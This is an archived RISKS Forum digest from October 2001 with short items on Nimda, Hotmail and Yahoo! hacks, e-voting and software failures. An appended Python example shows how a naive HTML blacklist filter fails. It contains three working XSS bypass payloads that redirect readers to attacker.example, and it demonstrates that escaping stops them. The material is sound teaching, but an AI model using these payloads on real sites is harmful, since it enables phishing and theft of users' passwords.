Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
precedence: bulk
Subject: Risks Digest 21.67

RISKS-LIST: Risks-Forum Digest  Monday 1 October 2001  Volume 21 : Issue 67

   FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
   ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at and by anonymous ftp at ftp.sri.com, cd risks .

  Contents:
Aftermath of 11 September 2001 (PGN)
GAO reports on terrorism (Monty Solomon)
Warding off cyberterrorist attacks (NewsScan)
Hackers face life imprisonment under 'Anti-Terrorism' Act (Monty Solomon)
Gartner "Nimda Worm shows you can't always patch fast enough"
  (Alistair McDonald)
Hacker re-writes Yahoo! news stories (Gary Stock)
YAHA: Yet Another Hotmail Attack (Alistair McDonald)
Hackers and others win big in Net casino attacks (Ken Nitz)
Creator of Kournikova virus gets 150 hours of community service (Abigail)
"Good Samaritan" hacker pleads guilty to breaking and entering
  (Declan McCullagh)
U.S. court shuts down deceptive Web sites (Jim Griffith)
Report on vulnerabilities of GPS (Joseph Bergin)
All public hospitals in Gothenburg Sweden crippled by Nimda (Peter Håkanson)
Y2K flaw blamed for Down's Syndrome test errors (Les Weston)
Re: Oxygen tank kills MRI exam subject (PGN)
E-voting in Australia (Tony Jones)
Australians voice anger over online spying (Monty Solomon)
World Trade Center in RISKS (Jay R. Ashworth)
We only reveal a few digits of your account number, don't worry (Dan Jacobson)
X-ray machine risk (Asa Bour)
Increasing RISKS of UPPER CASE (Stuart Prescott)
2002 USENIX Annual Technical Conference - Call for papers (Ann Tsai)
Abridged info on RISKS (comp.risks)

----------------------------------------------------------------------

Date: Mon, 1 Oct 2001 11:06:12 PDT
From: "Peter G. Neumann"
Subject: Aftermath of 11 September 2001

The Risks Forum has long advocated the importance of increased awareness of
risks and avoidance of critical systems with too many inherent weak links.
On 11 Sep 2001, the Internet stood up well and was a very important source
of information; land-based and cellular telephone systems experienced major
outages in lower Manhattan.  A few companies such as Cantor-Fitzgerald and
eSpeed suffered huge personnel losses, but were nevertheless able to resume
operations quickly -- through various combinations of advanced planning and
rapid recovery strategies.  There are many lessons that are worth recording
here, so I would like to invite some of you to contribute short but pithy
items on what was achieved, what was learned, and what insights you might
have gained.  [Thanks to Scott Rainey for encouraging me to do this.]

------------------------------

Date: Thu, 20 Sep 2001 17:28:02 -0400
From: "monty solomon"
Subject: GAO reports on terrorism

Combating Terrorism: Selected Challenges and Related Recommendations.
GAO-01-822, September 20.
http://www.gao.gov/new.items/d01822.pdf

Aviation Security: Terrorist Acts Demand Urgent Need to Improve Security at
the Nation's Airports, by Gerald L. Dillingham, director, physical
infrastructure issues, before the Senate Committee on Commerce, Science, and
Transportation.  GAO-01-1162T, September 20.
http://www.gao.gov/new.items/d011162t.pdf

Aviation Security: Terrorist Acts Illustrate Severe Weaknesses in Aviation
Security, by Gerald L. Dillingham, director, physical infrastructure, before
a joint hearing of the Senate and House Appropriations Subcommittees on
Transportation and Related Agencies.  GAO-01-1166T, September 20.
http://www.gao.gov/new.items/d011166t.pdf

------------------------------

Date: Mon, 01 Oct 2001 08:19:36 -0700
From: "NewsScan"
Subject: Warding off cyberterrorist attacks

Internet experts believe that the threat of cyber-attacks is increasing,
though not necessarily from Osama bin Laden's AlQaida network, which seems
focused on destroying physical targets and killing civilians.  Georgetown
University computer science professor Dorothy Denning says, "It's my
understanding that they're not teaching this in the terrorist-training
camps," but rather that the danger comes from "these thousands of affiliates
or sympathizers."  Stephen Northcutt, who runs an information warfare
simulation for the SANS Institute, warns that terrorists could "potentially
paralyze commerce" and might be able to "accomplish a cascading failure of
the electronic grid."  (*San Jose Mercury News*, 1 Oct 2001; NewsScan Daily,
1 October 2001; http://www.siliconvalley.com/docs/news/depth/cyber100101.htm)

  [Also, there is clearly renewed interest in off-site backup data storage.
  PGN]

------------------------------

Date: Tue, 25 Sep 2001 16:32:58 -0400
From: Monty Solomon
Subject: Hackers face life imprisonment under 'Anti-Terrorism' Act

Hackers face life imprisonment under 'Anti-Terrorism' Act;
Justice Department proposal classifies most computer crimes as acts of
terrorism
By Kevin Poulsen, 23 Sep 2001

Hackers, virus-writers and web site defacers would face life imprisonment
without the possibility of parole under legislation proposed by the Bush
Administration that would classify most computer crimes [and maybe noncrimes
(PGN)?] as acts of terrorism.

The Justice Department is urging Congress to quickly approve its
Anti-Terrorism Act (ATA), a twenty-five page proposal that would expand the
government's legal powers to conduct electronic surveillance, access business
records, and detain suspected terrorists.

  [See http://www.securityfocus.com/news/257 for the full item.  PGN]

------------------------------

Date: Fri, 21 Sep 2001 13:07:00 +0100
From: Alistair McDonald
Subject: Gartner "Nimda Worm shows you can't always patch fast enough"

Gartner is recommending that IIS users who have been hit by the recent MS
exploits should "immediately" consider moving to alternatives such as Apache
or iPlanet.
  http://www4.gartner.com/DisplayDocument?doc_cd=101034

But when will those in control take note?  I'm sure that a lot of NT/2000
sysadmins (and especially Webmasters) are aware of the limitations of their
platform, but corporate strategy means that they are a "Microsoft shop".

Alistair McDonald, Bacchus Consultancy  www.bacchusconsultancy.com

------------------------------

Date: Mon, 24 Sep 2001 09:50:34 -0400
From: Gary Stock
Subject: Hacker re-writes Yahoo! news stories

Will Knight, New Scientist, 20 Sep 01
http://www.newscientist.com/news/news.jsp?id=ns99991329

A computer security expert has revealed how he altered news articles posted
to Yahoo!'s web site without permission.  The incident highlights the danger
of hackers posting misleading information to respected news outlets.

Freelance security consultant Adrian Lamo demonstrated that, armed only with
an ordinary Internet browser, he could access the content management system
used by Yahoo!'s staff to upload daily news.  He added the false quotes to
stories to prove the hole was real to computer specialist site Security
Focus.

Yahoo! has issued a statement saying the vulnerability has been fixed and
security is being reviewed.  But experts say that the incident demonstrates
a serious risk.  "Just think how much damage you could do by changing the
quarterly results of a company in a story," says J J Gray, a consultant with
computer consultants @Stake.

Gary Stock, CIO & Technical Compass, Nexcerpt, Inc.
1-616.226.9550  gstock@nexcerpt.com

------------------------------

Date: Fri, 21 Sep 2001 09:49:00 +0100
From: Alistair McDonald
Subject: YAHA: Yet Another Hotmail Attack

Yet another attack on Hotmail.  Computing (20 Sept 2001) reports that one
can hack the Hotmail web site, and redirect users to another site.  This
brings up the possibility of password collecting.  The hacker, known as
"Oblivion", reported this to the bugtraq mailing list.  The exploit involves
smuggling JavaScript code through the filters used at Hotmail.

Alistair McDonald, Bacchus Consultancy  www.bacchusconsultancy.com

------------------------------

Date: Mon, 10 Sep 2001 09:14:27 -0700
From: Ken Nitz
Subject: Hackers and others win big in Net casino attacks

http://news.excite.com/news/r/010910/11/net-tech-gambling-hacking-dc

  [The article is on risks in on-line gambling, and particularly
  CryptoLogic, Inc., a Canadian on-line casino games developer that has been
  hacked.  One of their sites had been "fixed" so that craps and video slot
  players could not lose, with winnings totalling $1.9 million.  Every dice
  throw turned up doubles, and every slot spin generated a perfect match.
  Whether it was an insider attack or a penetration is not clear from the
  article.  (We noted the likelihood of hacking of Internet gambling sites in
  RISKS-19.27, 1 Aug 1997, not to mention my 1995 April Fool's piece in
  RISKS-17.02.)  Interesting question: which laws against hacking will apply
  to subversions of illegal Internet gambling parlors?  Who gets to prosecute
  remote attacks on off-shore operations?  PGN-ed]

------------------------------

Date: Fri, 28 Sep 2001 01:16:42 +0200
From: "Abigail"
Subject: Creator of Kournikova virus gets 150 hours of community service

From http://www.volkskrant.nl/nieuws/nieuwemedia/1001567916953.html
(in Dutch).  27 Sep 2001

The 20-year-old creator of the Kournikova virus, J. de W. from Sneek, was
sentenced to 150 hours of community service by the court of Leeuwarden this
Thursday.  The prosecution demanded the maximum of 240 hours of community
service.

In February De W. released on the Internet the so-called worm virus, which
spread itself as an e-mail message.  The virus was activated by clicking the
e-mail, which was titled Anna Kournikova (the tennis player).  This led to
inconvenience for Internet users all over the world.

When determining the sentence, the court took into consideration that the
boy had no previous run-in with justice, that he turned himself in, and that
material damages were limited.  The American investigation service FBI
reported an amount of $166,827 in damages.

------------------------------

Date: Thu, 27 Sep 2001 12:53:53 -0400
From: Declan McCullagh
Subject: FC: "Good Samaritan" hacker pleads guilty to breaking and entering

  [Follow-up on RISKS-21.62 items.  PGN]

'Good Sam' Hacker 'Fesses Up, By Declan McCullagh, 27 Sep 2001
declan@wired.com

It seemed like such a straightforward example of prosecutorial misconduct:
An Oklahoma man was being investigated by the Justice Department for helping
a newspaper fix a Web site security hole.

The outcry among the geek community last month began with an uncritical
story on LinuxFreak.org entitled "Cyber Citizen Lands Felony Charges?"
Sites such as Slashdot soon picked up the sad tale of 24-year-old Brian K.
West as evidence of out-of-control, tech-clueless government lawyers, and
urged everyone to e-mail the U.S. Attorney in charge of the prosecution.

Making the story even more appealing to the open-source community was the
Microsoft angle: West was said to have reported to the Poteau (Oklahoma)
Daily News and Sun a security flaw in Microsoft NT 4.0 IIS and Microsoft
FrontPage.

But a guilty plea that West signed tells a far different story -- and shows
how easily a well-meaning community of programmers and system administrators
can be led astray.
  http://www.wired.com/news/politics/0,1283,47146,00.html

  [Politech archive on U.S. v. Brian K. West:
  http://www.politechbot.com/cgi-bin/politech.cgi?name=sperling]

  [PGN-excerpted from the Sperling release:
    While probing the site, defendant made copies of six proprietary
    Practical Extraction Report Language (PERL) scripts that were part of
    the source code running the PDNS Web page.  Defendant also obtained
    password files from PDNS and used those passwords to access other parts
    of the PDNS Web page.  Defendant electronically shared the scripts and
    the password files for the PDNS Web site with another individual.
    Defendant's access to the Web page involved interstate communications.
    ...]

------------------------------

Date: Mon, 1 Oct 2001 14:59:23 -0500 (CDT)
From: griffith@olagrande.net
Subject: U.S. court shuts down deceptive Web sites

Reuters reports that the U.S. District Court in Philadelphia has ordered
John Zuccarina to shut down sites operated by him.  The Federal Trade
Commission filed a complaint against Zuccarina, claiming that he has
purchased domain names which are misspellings or other "one-offs" of popular
sites, which he uses to "blitz" unsuspecting visitors with pop-up ads, from
which the user cannot escape, in order to receive advertising revenue
(estimated between $800K and $1 million).  Zuccarina has registered some
5500 domains, including www.annakurnikova.com, 41 variants of "Britney
Spears", and others.
  http://www0.mercurycenter.com/breaking/docs/081329.htm

------------------------------

Date: Tue, 11 Sep 2001 07:31:31 -0400
From: Joseph Bergin
Subject: Report on vulnerabilities of GPS

Yesterday (10 Sept. 2001) the U.S. Transportation dept released a report on
the vulnerabilities of the Global Positioning System.  The report can be
obtained from
  http://www.navcen.uscg.gov/gps/geninfo/pressrelease.htm
There is a short story about it in *The New York Times*, 11 Sep 2001:
  http://www.nytimes.com/2001/09/11/national/11NAVI.html

The report notes that GPS is being increasingly relied on for life-critical
performance in transportation and recommends that various backups be
maintained and new ones developed.

Joseph Bergin, Professor, Pace University, Computer Science, One Pace Plaza,
NY NY 10038  berginf@pace.edu  HOMEPAGE http://csis.pace.edu/~bergin/

------------------------------

Date: Tue, 25 Sep 2001 10:42:55 +0200
From: Peter Håkanson
Subject: All public hospitals in Gothenburg Sweden crippled by Nimda

The hospitals in "Västra Götaland", Sweden (west coast, population 1M) were
isolated from the Internet during 23 Sep 2001.  Some of the internal networks
had to be partitioned to prevent Nimda spreading further.  Reservations and
computer-based medical records were unavailable.
  http://www.vgregion.se

The fact that a hospital chain has such relaxed security is amazing.  It's
also amazing that whole organizations are held hostage by a vendor that's
not even cost-effective.  What would happen in case we get a *real* threat
to security??

Peter Håkanson, IPSec sverige, Bror Nilssons gata 16 Lundbystrand
S-417 55 Gothenburg Sweden  "Safe by design"  +46707328101  peter@ipsec.nu

------------------------------

Date: Fri, 14 Sep 2001 13:24:33 +0100
From: Les Weston
Subject: Y2K flaw blamed for Down's Syndrome test errors

The Y2K problem is being blamed for incorrect Down's Syndrome results being
given to more than 150 pregnant women throughout northern England between
January and May last year.  As a result, four Down's syndrome pregnancies
went undetected.

Amongst other factors, the mother's age is used to assess her risk category.
Only those in the high-risk category undergo further tests for the syndrome.
Staff noticed the strange results coming from the system, but initially
thought they were due to a different mix of women being tested.

Full report:
  http://news.bbc.co.uk/hi/english/health/newsid_1541000/1541557.stm

Les Weston, Quinag-CSL, Edinburgh.

  [Also noted by several others.  TNX.  Overconfidence in the PathLAN
  computer was blamed for errors, occurring between 4 Jan and 24 May 2001.
  PGN]

------------------------------

Date: Sun, 30 Sep 2001 10:44:16 PDT
From: "Peter G. Neumann"
Subject: Re: Oxygen tank kills MRI exam subject (RISKS-21.55)

Westchester Medical Center was fined $22,000 for 11 violations related to
the death of the 6-year-old boy killed by the magnetically attracted stray
oxygen tank carried into the room by a doctor.
  http://www.newsday.com/news/nationworld/wire/sns-ap-mri-death0928sep28.story

------------------------------

Date: Sun, 23 Sep 2001 06:31:10 +1000 (EST)
From: tmj@enternet.com.au (Tony Jones)
Subject: E-voting in Australia

On 20 October 2001 there will be an election of members of the Legislative
Assembly of the Australian Capital Territory.  It is hoped that about 9% of
voting will be done using a new electronic voting system.  Further details
are at .

For the electronic system, no independently verifiable copy of a voter's
choices will be kept.  The selections made by a voter and displayed on the
monitor of the voting computer will be, we're led to believe, what go into
the duplicated databases for counting.

RISKS readers will be reassured to know that (see ):

  "The new software will be subjected to extensive testing to ensure it is
  accurate and secure, as well as easy to use.  The software will be used on
  standard computer hardware, that will not be connected to any external
  networks.  The system will also include numerous backups and safeguards to
  ensure that voting data will not be lost.  This will guarantee the security
  of the electronic voting and counting processes," Mr Green [the ACT
  Electoral Commissioner] said.

I hope Murphy is not eligible to vote.

  [Actually, given the flakiness and lack of security in existing
  all-electronic voting systems, it is likely that Murphy's entire surrogate
  extended family will be able to vote repeatedly, many times over.  PGN]

------------------------------

Date: Sat, 8 Sep 2001 13:08:38 -0400
From: Monty Solomon
Subject: Australians voice anger over online spying

Australians voice anger over online spying
By Rachel Lebihan, ZDNet Australia News, 07 September 2001

Only three percent of surveyed ZDNet readers believe Internet Service
Providers should monitor all user activity, following a parliamentary report
that recommends user logs should be kept on customers' online activities.

The diminutive support for tighter online monitoring was transcended by a
resounding 60 percent of polled readers who said they would kick up a fuss
until the law was changed, if ISPs were forced to maintain access logs.
  http://www.zdnet.com.au/news/breakingnews/story/0,2000020826,20259325,00.htm

------------------------------

Date: Tue, 11 Sep 2001 16:36:04 -0400
From: "Jay R. Ashworth"
Subject: World Trade Center in RISKS

In light of this morning's events, which I will not minimize by trying to
select an adjective to describe, I thought it might be interesting to search
the RISKS archives, and see how the building's history figures in that
sphere.

First, there's coverage of the car bombing, and how the evac plan and
generators failed, in
  http://catless.ncl.ac.uk/Risks/14.37.html#subj4.1
with follow-on in
  http://catless.ncl.ac.uk/Risks/14.38.html#subj5.1
  http://catless.ncl.ac.uk/Risks/14.39.html#subj8.3

There's other coverage of the bombing, as well, in
  http://catless.ncl.ac.uk/Risks/14.39.html#subj8.2
which discusses how the building operators are allowed to violate the
building codes that they would be otherwise bound by.

Also, http://catless.ncl.ac.uk/Risks/14.39.html#subj8.2 discusses the fact
that damned near every TV and most of the radio broadcast antennas serving
NYC and Eastern NY State just hit the ground as well; that had to be making
life miserable for people trying to get the word out.

http://catless.ncl.ac.uk/Risks/14.41.html#subj1.1 discusses an ATM outage in
NJ attributable to the evac from that bombing.  Another outage in California
happened at least in part because the backup systems were otherwise occupied
due to that same situation:
  http://catless.ncl.ac.uk/Risks/14.41.html#subj2.1

http://catless.ncl.ac.uk/Risks/17.17.html#subj10.1 notes in passing that the
WTC is not alone in having such problems.  [Discussion of the Citicorp
problems and unlikely events.  PGN]

Jay R. Ashworth, Member of the Technical Staff, Baylink, Tampa Bay, Florida
http://baylink.pitas.com  +1 727 804 5015  jra@baylink.com

------------------------------

Date: 12 Sep 2001 13:04:10 +0800
From: Dan Jacobson
Subject: We only reveal a few digits of your account number, don't worry

> Re: Consumer Reports password policy risks (Bumgarner, RISKS-21.65)
> ... but does give the last five digits

Sounds like the Taiwan power company sending bills with only the last few
digits of your auto-payment bank account revealed, the phone company sending
theirs with only the first few digits revealed.  Steal two envelopes and
you've got the account number?

http://www.geocities.com/jidanni/  Tel+886-4-25854780

------------------------------

Date: Thu, 27 Sep 2001 23:16:04 -0400 (EDT)
From: Asa Bour
Subject: X-ray machine risk

I had to get some x-rays recently.  I felt real confident when I saw a
bright yellow post-it note on the x-ray machine with bold print stating that
the measurements were in mm (millimeters) and not in cm (centimeters).
Since the note was needed, one can assume they had problems with people
calibrating the machine properly with the right units.  I think the x-ray
software interface needs some improvement to eliminate this danger of
miscalibration.

E. Asa Bour  http://www.scripturememory.org/  http://www.schemer.com/

------------------------------

Date: Mon, 24 Sep 2001 16:18:34 +1000
From: Stuart Prescott
Subject: Increasing RISKS of UPPER CASE

I recently received a confirmation e-mail from an Australian domestic
airline confirming a booking I had made over the web.  The entire e-mail was
in capitals (were they shouting at me or was it all "very important"?)
including a little URL at the bottom for more information on in-flight
health:

> SOME STUDIES HAVE CONCLUDED THAT PROLONGED IMMOBILITY MAY BE A RISK
> FACTOR IN THE FORMATION OF BLOOD CLOTS IN THE LEGS,
> (DVT - DEEP VEIN THROMBOSIS). IF YOU FEEL YOU MAY BE AT RISK FROM
> DVT OR OTHER HEALTH PROBLEMS, QANTAS RECOMMENDS YOU CONSULT WITH
> YOUR DOCTOR BEFORE TRAVEL. INFORMATION ON HEALTH ISSUES CAN BE
> FOUND ON OUR WEBSITE -
> WWW.QANTAS.COM.AU/FLIGHTS/ESSENTIALS/HEALTHINFLIGHT.HTML,
> IN OUR TIMETABLE AND INFLIGHT MAGAZINE OR CONTACT YOUR LOCAL QANTAS
> OFFICE.

No prizes for guessing whether or not the all-uppercase URL works...

So the RISKS... other than making the entire message much harder to read,
you can also break things.

------------------------------

Date: Tue, 18 Sep 2001 13:34:59 -0700
From: Ann Tsai
Subject: 2002 USENIX Annual Technical Conference - Call for papers

2002 USENIX Annual Technical Conference, June 9-14, 2002, Monterey, CA
http://www.usenix.org/events/usenix02/

Submissions to the General Refereed Sessions Track are due on November 19,
2001.

FREENIX is a special track within the USENIX Annual Technical Conference
that showcases the latest developments and applications in freely
redistributed technology.  The FREENIX track covers the full range of
software and source code including but not limited to Apache, Darwin,
FreeBSD, GNOME, GNU, KDE, Linux, NetBSD, OpenBSD, Perl, PHP, Python, Samba,
Tcl/Tk and more.  The FREENIX program committee is looking for papers about
projects with a solid emphasis on nurturing the open source/freely available
software community and talks which advance the state of the art of freely
redistributable software.  Areas of interest include, but are not limited

Submissions to the Freenix Track are due on November 12, 2001.

Submission guidelines and conference details are available on our Web site:
  http://www.usenix.org/events/usenix02/cfp/

The 2002 USENIX Annual Technical Conference is sponsored by USENIX, The
Advanced Computing Systems Association.  www.usenix.org

------------------------------

Date: 12 Feb 2001 (LAST-MODIFIED)
From: RISKS-request@csl.sri.com
Subject: Abridged info on RISKS (comp.risks)

 The RISKS Forum is a MODERATED digest.  Its Usenet equivalent is comp.risks.
=> SUBSCRIPTIONS: PLEASE read RISKS as a newsgroup (comp.risks or equivalent)
 if possible and convenient for you.  Alternatively, via majordomo,
 send e-mail requests to with one-line body
   subscribe [OR unsubscribe]
 which requires your ANSWERing confirmation to majordomo@CSL.sri.com .
 [If E-mail address differs from FROM:  subscribe "other-address " ;
 this requires PGN's intervention -- but hinders spamming subscriptions, etc.]
 Lower-case only in address may get around a confirmation match glitch.
   INFO     [for unabridged version of RISKS information]
 There seems to be an occasional glitch in the confirmation process, in which
 case send mail to RISKS with a suitable SUBJECT and we'll do it manually.
   .MIL users should contact (Dennis Rears).
   .UK users should contact .
=> The INFO file (submissions, default disclaimers, archive sites,
 copyright policy, PRIVACY digests, etc.) is also obtainable from
 http://www.CSL.sri.com/risksinfo.html  ftp://www.CSL.sri.com/pub/risks.info
 The full info file will appear now and then in future issues.  *** All
 contributors are assumed to have read the full info file for guidelines. ***
=> SUBMISSIONS: to risks@CSL.sri.com with meaningful SUBJECT: line.
=> ARCHIVES are available: ftp://ftp.sri.com/risks or
 ftp ftp.sri.com
 login anonymous
 [YourNetAddress]
 cd risks
   [volume-summary issues are in risks-*.00]
   [back volumes have their own subdirectories, e.g., "cd 20" for volume 20]
 http://catless.ncl.ac.uk/Risks/VL.IS.html      [i.e., VoLume, ISsue].
   Lindsay Marshall has also added to the Newcastle catless site a palmtop
   version of the most recent RISKS issue and a WAP version that works for
   many but not all telephones: http://catless.ncl.ac.uk/w/r
 http://the.wiretapped.net/security/info/textfiles/risks-digest/ .
 http://www.planetmirror.com/pub/risks/
 ftp://ftp.planetmirror.com/pub/risks/
==> PGN's comprehensive historical Illustrative Risks summary of one liners:
    http://www.csl.sri.com/illustrative.html for browsing,
    http://www.csl.sri.com/illustrative.pdf or .ps for printing

------------------------------

End of RISKS-FORUM Digest 21.67
************************
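Editor's added example, appended after the digest to illustrate the YAHA item (Alistair McDonald's "Yet Another Hotmail Attack") above. It is not part of the digest and not the technique "Oblivion" posted to Bugtraq, which the item does not describe; it shows the general class of failure the item names, "smuggling JavaScript code through the filters". The one-pass blacklist filter, the three payloads and the attacker.example host are all constructed for this example and are not Hotmail's code. The tab-stripping modelled by browser_normalise is real browser URL-parser behaviour and is the reason the third payload works; the still_executable check is a deliberately crude scoring aid, not a sanitiser.

```python
"""Constructed example: why a one-pass blacklist on HTML e-mail lets
JavaScript through, and the escaping that does not. Not Hotmail's filter
and not the Bugtraq posting's technique."""
import html
import re

# One-pass blacklist of the kind webmail used around 2001 (constructed here).
SCRIPT_BLOCK = re.compile(r"<script[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)
JS_SCHEME = re.compile(r"javascript:", re.IGNORECASE)


def naive_filter(markup: str) -> str:
    """Strip <script>...</script> blocks and the literal 'javascript:' scheme,
    once, and pass the rest of the HTML through to the reader's browser."""
    markup = SCRIPT_BLOCK.sub("", markup)
    return JS_SCHEME.sub("", markup)


def escape_untrusted(markup: str) -> str:
    """Hardened alternative: do not pass untrusted HTML through at all.
    Escaping makes the browser render the text and never parse it as markup."""
    return html.escape(markup, quote=True)


def browser_normalise(markup: str) -> str:
    """Model of one URL-parser behaviour that defeats substring blacklists:
    ASCII tab, CR and LF are dropped from a URL before its scheme is read,
    so 'java<TAB>script:' is executed as 'javascript:'."""
    return re.sub(r"[\t\r\n]", "", markup)


# What a browser would still execute once the filtered markup is rendered:
# a <script> element, an on* handler inside a tag, or a javascript: URL in a
# tag's href/src attribute. Escaped text contains no '<' and cannot match.
EXECUTABLE = re.compile(
    r"<script\b"
    r"|<\w+[^>]*\son\w+\s*="
    r"|<\w+[^>]*\s(?:href|src)\s*=\s*[\"']?\s*javascript:",
    re.IGNORECASE,
)


def still_executable(filtered_markup: str) -> bool:
    """True if script would still run after the filter and browser parsing."""
    return EXECUTABLE.search(browser_normalise(filtered_markup)) is not None


# Constructed payloads; attacker.example is a placeholder host. Each one
# redirects the reader, the password-collecting setup the item warns about.
REDIRECT = "location='http://attacker.example/'"
PAYLOADS = {
    # 1. The filter runs once: removing the inner <script></script> leaves a
    #    well-formed outer <script> element behind.
    "nested tag": f"<scr<script></script>ipt>{REDIRECT}</scr<script></script>ipt>",
    # 2. No <script> and no 'javascript:' at all; an event handler suffices.
    "event handler": f'<img src=x onerror="{REDIRECT}">',
    # 3. A tab inside the scheme defeats the substring match; the browser
    #    strips the tab and runs the URL anyway.
    "split scheme": f'<a href="java\tscript:{REDIRECT}">read me</a>',
}


def evaluate(payloads: dict[str, str]) -> dict[str, tuple[bool, bool]]:
    """For each payload: (executable after naive_filter,
    executable after escape_untrusted)."""
    return {
        name: (still_executable(naive_filter(p)),
               still_executable(escape_untrusted(p)))
        for name, p in payloads.items()
    }


if __name__ == "__main__":
    for name, (naive, escaped) in evaluate(PAYLOADS).items():
        print(f"{name:14s} blacklist: {'BYPASSED' if naive else 'blocked':8s} "
              f"escaping: {'BYPASSED' if escaped else 'blocked'}")
```

All three payloads pass the blacklist and none survives escaping; the point for a webmail (or any) HTML filter is that removal-by-pattern has to be repeated to a fixed point and still misses whole syntactic categories, whereas escaping, or an allowlist parser that rebuilds the markup, removes the question of what the browser will tolerate.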